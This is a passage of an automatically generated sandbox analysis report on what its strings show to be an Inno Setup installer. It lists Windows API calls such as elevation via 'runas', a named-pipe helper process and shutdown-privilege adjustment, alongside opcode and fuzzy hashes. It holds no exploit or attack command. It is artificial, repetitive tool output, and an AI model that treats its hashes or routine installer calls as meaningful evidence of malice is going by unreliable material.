                                                            • Associated: 00000003.00000002.300373529.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300388682.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300396153.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300403206.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300409927.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: AttributesFile
                                                            • String ID:
                                                            • API String ID: 3188754299-0
                                                            • Opcode ID: fc7bba78512c36340606f51b3448168c2bfd95e472c364ddabcd04349e7824a7
                                                            • Instruction ID: d55d13c6b4de8628cf529bab2b0a17402205638270c5277f1e7dff5d9331f337
                                                            • Opcode Fuzzy Hash: fc7bba78512c36340606f51b3448168c2bfd95e472c364ddabcd04349e7824a7
                                                            • Instruction Fuzzy Hash: 75D012A034520019DE1455FE19F9F5907C45F85325B140B6EB965D51E2D3298F9B1059
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0042B8A3, Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SetErrorMode.KERNEL32(?,0042B8C1), ref: 0042B8B4
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.299473868.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300320952.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300327968.00000000006C6000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300333526.00000000006C7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300342993.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300351997.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300363739.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300368665.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300373529.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300388682.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300396153.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300403206.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300409927.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: ErrorMode
                                                            • String ID:
                                                            • API String ID: 2340568224-0
                                                            • Opcode ID: f668b7aac12c857ffb67314c22418dc82c6b08374c4fda6f72eaba5712bdb9bb
                                                            • Instruction ID: 1e160e63f6e1d4a3e736ac7d2d169814141797cfe1ada65cb98a64290c0f9c9c
                                                            • Opcode Fuzzy Hash: f668b7aac12c857ffb67314c22418dc82c6b08374c4fda6f72eaba5712bdb9bb
                                                            • Instruction Fuzzy Hash: 9CB09B76F0C2005DA709B695745146C67D8EBC47103E148A7F404C2540D57C5444451C
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 006ACE20, Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • FreeLibrary.KERNEL32(00000000,006B8CD8,00000000,006B8CE7,?,?,?,?,?,006B97CB), ref: 006ACE36
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.299473868.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300320952.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300327968.00000000006C6000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300333526.00000000006C7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300342993.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300351997.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300363739.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300368665.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300373529.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300388682.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300396153.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300403206.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300409927.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: FreeLibrary
                                                            • String ID:
                                                            • API String ID: 3664257935-0
                                                            • Opcode ID: d1033aaa8653b6f7709aea60d3a64e5207737459bb20ef6f0850b05c11f2e6ae
                                                            • Instruction ID: 0a261b708251fa214c00368c1c1d02b101a55c617d2dc256ba4673a2d64f6cb6
                                                            • Opcode Fuzzy Hash: d1033aaa8653b6f7709aea60d3a64e5207737459bb20ef6f0850b05c11f2e6ae
                                                            • Instruction Fuzzy Hash: 0DC002B0D131009ECF40DF7CDE45B4237E6A704305F081427F905C61A4D6344440EB24
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 004103B4, Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.299473868.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300320952.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300327968.00000000006C6000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300333526.00000000006C7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300342993.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300351997.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300363739.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300368665.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300373529.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300388682.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300396153.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300403206.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300409927.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: InfoSystem
                                                            • String ID:
                                                            • API String ID: 31276548-0
                                                            • Opcode ID: 824204c416b5721b5c5076045aab759d5d6ea889ca6f9a5639c93ededeac691c
                                                            • Instruction ID: dd27519167a78a1d4504dc33fea54df0b767f1302367e86ea931617165e635a5
                                                            • Opcode Fuzzy Hash: 824204c416b5721b5c5076045aab759d5d6ea889ca6f9a5639c93ededeac691c
                                                            • Instruction Fuzzy Hash: FAA012144089000ACC04F7194C4340B35905D40114FC40668745CA92C3E61985644ADB
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0047845C, Relevance: 1.3, APIs: 1, Instructions: 52memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,006D62F8,00000000,00000000,?,00478693,00000000,00000B06,00000000,?,00000000,00000000,00000000), ref: 0047847A
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.299473868.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300320952.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300327968.00000000006C6000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300333526.00000000006C7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300342993.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300351997.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300363739.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300368665.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300373529.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300388682.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300396153.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300403206.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300409927.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: AllocVirtual
                                                            • String ID:
                                                            • API String ID: 4275171209-0
                                                            • Opcode ID: 6c24b6a0fe5a989e3bb969723c1e56f7bd6d6c9795a823755d6c712a70d0a833
                                                            • Instruction ID: 21ed9f25b44590dd6a88678dd2699128a8c8abd14296acda62ee9fdc78064473
                                                            • Opcode Fuzzy Hash: 6c24b6a0fe5a989e3bb969723c1e56f7bd6d6c9795a823755d6c712a70d0a833
                                                            • Instruction Fuzzy Hash: F6114C746813069BC710DF19C880B86B7E5EB98350F10C53AE96C9F385E7B4E904CBA5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 004056E8, Relevance: 1.3, APIs: 1, Instructions: 41memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • VirtualAlloc.KERNEL32(00000000,0013FFF0,00001000,00000004,?,000001A3,00405CFF,000000FF,004062A4,00000000,0040F3A7,00000000,0040F8B5,00000000,0040FB77,00000000), ref: 004056FF
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.299473868.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300320952.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300327968.00000000006C6000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300333526.00000000006C7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300342993.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300351997.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300363739.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300368665.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300373529.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300388682.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300396153.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300403206.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300409927.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: AllocVirtual
                                                            • String ID:
                                                            • API String ID: 4275171209-0
                                                            • Opcode ID: a522bf9bd685f9285ef17df139ca3c83d4d9edda6c804f015ead83d427766566
                                                            • Instruction ID: 671f966e8e8ef53a1d331dc007cdee3d18c8d913abcb1f2bfacacf6af6d793b4
                                                            • Opcode Fuzzy Hash: a522bf9bd685f9285ef17df139ca3c83d4d9edda6c804f015ead83d427766566
                                                            • Instruction Fuzzy Hash: 9CF0AFF2B003018FD7549FB89D40B12BBD6E708354F20413EE90DEB794D7B088008B88
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Non-executed Functions

                                                            Function 00625754, Relevance: 40.4, APIs: 11, Strings: 12, Instructions: 187pipeprocessfileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetTickCount.KERNEL32 ref: 006257BC
                                                            • QueryPerformanceCounter.KERNEL32(00000000,00000000,00625A4F,?,?,00000000,00000000,?,0062644E,?,00000000,00000000), ref: 006257C5
                                                            • GetSystemTimeAsFileTime.KERNEL32(00000000,00000000,00000000,40080003,00000006,00000001,00002000,00002000,00000000,00000000), ref: 006257CF
                                                            • GetCurrentProcessId.KERNEL32(?,00000000,00000000,00625A4F,?,?,00000000,00000000,?,0062644E,?,00000000,00000000), ref: 006257D8
                                                            • CreateNamedPipeW.KERNEL32(00000000,40080003,00000006,00000001,00002000,00002000,00000000,00000000), ref: 0062584E
                                                            • GetLastError.KERNEL32(00000000,40080003,00000006,00000001,00002000,00002000,00000000,00000000), ref: 0062585C
                                                            • CreateFileW.KERNEL32(00000000,C0000000,00000000,006CD098,00000003,00000000,00000000,00000000,00625A0B,?,00000000,40080003,00000006,00000001,00002000,00002000), ref: 006258A4
                                                            • SetNamedPipeHandleState.KERNEL32(000000FF,00000002,00000000,00000000,00000000,006259FA,?,00000000,C0000000,00000000,006CD098,00000003,00000000,00000000,00000000,00625A0B), ref: 006258DD
                                                              • Part of subcall function 005C745C: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 005C746F
                                                            • CreateProcessW.KERNEL32 ref: 00625986
                                                            • CloseHandle.KERNEL32(?,00000000,00000000,?,00000000,00000000,000000FF,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000), ref: 006259BC
                                                            • CloseHandle.KERNEL32(000000FF,00625A01,?,00000000,00000000,000000FF,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000,00000000), ref: 006259F4
                                                              • Part of subcall function 0060CE84: GetLastError.KERNEL32(00000000,0060DBAA,00000005,00000000,0060DBD2,?,?,006D579C,?,00000000,00000000,00000000,?,006B910F,00000000,006B912A), ref: 0060CE87
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.299473868.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300320952.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300327968.00000000006C6000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300333526.00000000006C7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300342993.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300351997.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300363739.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300368665.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300373529.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300388682.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300396153.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300403206.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300409927.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: CreateHandle$CloseErrorFileLastNamedPipeProcessSystemTime$CountCounterCurrentDirectoryPerformanceQueryStateTick
                                                            • String ID: 64-bit helper EXE wasn't extracted$Cannot utilize 64-bit features on this version of Windows$CreateFile$CreateNamedPipe$CreateProcess$D$Helper process PID: %u$SetNamedPipeHandleState$Starting 64-bit helper process.$\\.\pipe\InnoSetup64BitHelper-%.8x-%.8x-%.8x-%.8x%.8x$helper %d 0x%x$i
                                                            • API String ID: 770386003-3271284199
                                                            • Opcode ID: 05f0d23c42287ecae2e57217e457ed2ec46126e3f6ae7872c277f0bd952ed0eb
                                                            • Instruction ID: 34d3d620ae4a6a58b4d890a55742d975a8112a0372845dc610fa96f79e58b5cb
                                                            • Opcode Fuzzy Hash: 05f0d23c42287ecae2e57217e457ed2ec46126e3f6ae7872c277f0bd952ed0eb
                                                            • Instruction Fuzzy Hash: 21717F70E407589EDB20EFB9DC46B9EBBB6EF09304F1041A9F509EB282D77499408F65
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 006A60E8, Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 93COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 006A5F04: GetModuleHandleW.KERNEL32(kernel32.dll,GetFinalPathNameByHandleW), ref: 006A5F30
                                                              • Part of subcall function 006A5F04: GetFileAttributesW.KERNEL32(00000000,00000000,kernel32.dll,GetFinalPathNameByHandleW), ref: 006A5F49
                                                              • Part of subcall function 006A5F04: CreateFileW.KERNEL32(00000000,00000000,00000007,00000000,00000003,00000000,00000000,00000000,00000000,kernel32.dll,GetFinalPathNameByHandleW), ref: 006A5F73
                                                              • Part of subcall function 006A5F04: CloseHandle.KERNEL32(00000000), ref: 006A5F91
                                                              • Part of subcall function 006A6014: GetCurrentDirectoryW.KERNEL32(00000104,?,00000000,006A60A5,?,00000097,00000000,?,006A611F,00000000,006A6237,?,?,00000001), ref: 006A6043
                                                            • ShellExecuteExW.SHELL32(0000003C), ref: 006A616F
                                                            • GetLastError.KERNEL32(00000000,006A6237,?,?,00000001), ref: 006A6178
                                                            • MsgWaitForMultipleObjects.USER32 ref: 006A61C5
                                                            • GetExitCodeProcess.KERNEL32 ref: 006A61EB
                                                            • CloseHandle.KERNEL32(00000000,006A621C,00000000,00000000,000000FF,000004FF,00000000,006A6215,?,00000000,006A6237,?,?,00000001), ref: 006A620F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.299473868.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300320952.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300327968.00000000006C6000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300333526.00000000006C7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300342993.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300351997.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300363739.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300368665.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300373529.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300388682.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300396153.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300403206.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300409927.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: Handle$CloseFile$AttributesCodeCreateCurrentDirectoryErrorExecuteExitLastModuleMultipleObjectsProcessShellWait
                                                            • String ID: <$GetExitCodeProcess$MsgWaitForMultipleObjects$ShellExecuteEx$ShellExecuteEx returned hProcess=0$runas
                                                            • API String ID: 254331816-221126205
                                                            • Opcode ID: c2adbbc871acc4843ce61d2285dfbb2c69ebc7a97822930896cce5b608feca68
                                                            • Instruction ID: 3b593d6e4f6188ec2893085c4d8bc70e2010c955c7988aee54b7ca20d83eebf0
                                                            • Opcode Fuzzy Hash: c2adbbc871acc4843ce61d2285dfbb2c69ebc7a97822930896cce5b608feca68
                                                            • Instruction Fuzzy Hash: 4931AF70A00208AFDB10FFE9C842A9DBABAEF06314F44053DF514E62D2D7789E448F29
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0040E0D4, Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 140stringlibraryfileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(kernel32.dll,0041CF90,?,?), ref: 0040E0F1
                                                            • GetProcAddress.KERNEL32(00000000,GetLongPathNameW), ref: 0040E102
                                                            • FindFirstFileW.KERNEL32(?,?,kernel32.dll,0041CF90,?,?), ref: 0040E202
                                                            • FindClose.KERNEL32(?,?,?,kernel32.dll,0041CF90,?,?), ref: 0040E214
                                                            • lstrlenW.KERNEL32(?,?,?,?,kernel32.dll,0041CF90,?,?), ref: 0040E220
                                                            • lstrlenW.KERNEL32(?,?,?,?,?,kernel32.dll,0041CF90,?,?), ref: 0040E265
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.299473868.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300320952.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300327968.00000000006C6000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300333526.00000000006C7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300342993.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300351997.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300363739.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300368665.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300373529.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300388682.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300396153.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300403206.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300409927.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: Findlstrlen$AddressCloseFileFirstHandleModuleProc
                                                            • String ID: GetLongPathNameW$\$kernel32.dll
                                                            • API String ID: 1930782624-3908791685
                                                            • Opcode ID: 1e5aa63ad13805ebe641060d55f71927a25656d4bbeb27d65059da7d04647448
                                                            • Instruction ID: 85f15f90104044dde56611b048d4fe37091be9da2e2d426f5e1dee482ffdf80d
                                                            • Opcode Fuzzy Hash: 1e5aa63ad13805ebe641060d55f71927a25656d4bbeb27d65059da7d04647448
                                                            • Instruction Fuzzy Hash: 09418471E005189BCB10DAA6CC85ADEB3B9EF44310F1449FAD504F72C1EB789E568F89
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0060F6D8, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 42shutdownCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetCurrentProcess.KERNEL32(00000028), ref: 0060F6E8
                                                            • OpenProcessToken.ADVAPI32(00000000,00000028), ref: 0060F6EE
                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,00000028), ref: 0060F707
                                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000002,00000000,00000000,00000000), ref: 0060F72E
                                                            • GetLastError.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 0060F733
                                                            • ExitWindowsEx.USER32(00000002,00000000), ref: 0060F744
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.299473868.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300320952.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300327968.00000000006C6000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300333526.00000000006C7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300342993.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300351997.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300363739.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300368665.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300373529.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300388682.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300396153.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300403206.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300409927.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: ProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
                                                            • String ID: SeShutdownPrivilege
                                                            • API String ID: 107509674-3733053543
                                                            • Opcode ID: db782202178d27a3b7ec1b4d3af323313e6a5951352ddb141a95d71b7c8baf5b
                                                            • Instruction ID: 06ed2f01938c74524bf5f5b14376f39d724559be6214a1270456cb597724f4e2
                                                            • Opcode Fuzzy Hash: db782202178d27a3b7ec1b4d3af323313e6a5951352ddb141a95d71b7c8baf5b
                                                            • Instruction Fuzzy Hash: 8EF090306E430276E624AF719C47FEB218D9B40B09F50092DF644D61C1DBA9E589826B
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 006A68B0, Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 172windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • IsIconic.USER32(?), ref: 006A6913
                                                            • GetWindowLongW.USER32(?,000000F0), ref: 006A6930
                                                            • GetWindowLongW.USER32(?,000000EC), ref: 006A6955
                                                              • Part of subcall function 005ABC0C: IsWindow.USER32(8B565300), ref: 005ABC1A
                                                              • Part of subcall function 005ABC0C: EnableWindow.USER32(8B565300,000000FF), ref: 005ABC29
                                                            • GetActiveWindow.USER32 ref: 006A6A34
                                                            • SetActiveWindow.USER32(00000005,006A6A9E,006A6AB4,?,?,000000EC,?,000000F0,00000000,006A6ACD,?,00000000,?,00000000), ref: 006A6A87
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.299473868.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300320952.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300327968.00000000006C6000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300333526.00000000006C7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300342993.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300351997.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300363739.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300368665.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300373529.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300388682.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300396153.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300403206.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300409927.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: Window$ActiveLong$EnableIconic
                                                            • String ID: `
                                                            • API String ID: 4222481217-2679148245
                                                            • Opcode ID: bbb381b8fbc4d8b387cdcd93e1fcf562f63046ab1121e3482b0235a5bbb07c6f
                                                            • Instruction ID: 936cf99dd23b6ce25ef8ab77046748165037aff960be166beb91cb3f54ae6a19
                                                            • Opcode Fuzzy Hash: bbb381b8fbc4d8b387cdcd93e1fcf562f63046ab1121e3482b0235a5bbb07c6f
                                                            • Instruction Fuzzy Hash: C3611875A002099FDB00EFA9C885A9EBBF6FB4A304F598469F914EB361D734AD41CF50
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 006B8DE4, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 89fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • FindFirstFileW.KERNEL32(00000000,?,00000000,006B8F21,?,006D579C,?,?,006B90D6,00000000,006B912A,?,00000000,00000000,00000000), ref: 006B8E35
                                                            • SetFileAttributesW.KERNEL32(00000000,00000010), ref: 006B8EB8
                                                            • FindNextFileW.KERNEL32(000000FF,?,00000000,006B8EF4,?,00000000,?,00000000,006B8F21,?,006D579C,?,?,006B90D6,00000000,006B912A), ref: 006B8ED0
                                                            • FindClose.KERNEL32(000000FF,006B8EFB,006B8EF4,?,00000000,?,00000000,006B8F21,?,006D579C,?,?,006B90D6,00000000,006B912A), ref: 006B8EEE
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.299473868.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300320952.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300327968.00000000006C6000.00000008.00020000.sdmp Download File
